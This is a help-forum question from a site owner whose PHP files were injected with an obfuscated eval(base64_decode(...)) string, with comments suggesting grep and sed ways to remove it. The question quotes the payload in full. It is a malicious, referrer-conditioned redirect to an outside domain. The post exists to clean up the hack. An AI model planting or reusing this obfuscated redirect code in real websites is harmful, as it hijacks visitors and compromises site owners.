1

Possible Duplicate:
How can I do a recursive find and replace from the command line?

one of our sites got hacked with a base64 hash that is about 1000 characters long. How can i search and replace this string with a a space in multiple files and get rid of it?

here is the string

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vc21vb3RoLnlndG8uY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));
Community
  • 1
Exploit
  • 639
  • Possible duplicate: http://superuser.com/q/428493 – Indrek Oct 09 '12 at 23:49
  • its not a duplicate because no find-and-replace app out there is doing it with 1k chars long – Exploit Oct 09 '12 at 23:52
  • You might want to consider to replace eval(base64_decode( by // XXX evil eval: to comment out the offending code to start with. Even more smart would be to make a regexp match that does eval(base64_decode(.*$ to match until the end of the line (which is what $ does), which can get you rid of any occurence without resorting to an exact match. If the amount of occurences is low you might get around with just grep -r eval to find in which files is it located and manually change them until that command no longer returns any results. In any case, the duplicate gives you a good start... – Tamara Wijsman Oct 09 '12 at 23:58
  • @SarmenB. The length of the string doesn't matter, you can replace the actual base64-encoded string with a regex. Something like this should do it: find -name '*.php' -exec sed -r -i 's/eval\(base64_decode\(".*?"\)\);//g' {} + – Indrek Oct 10 '12 at 00:13

0 Answers0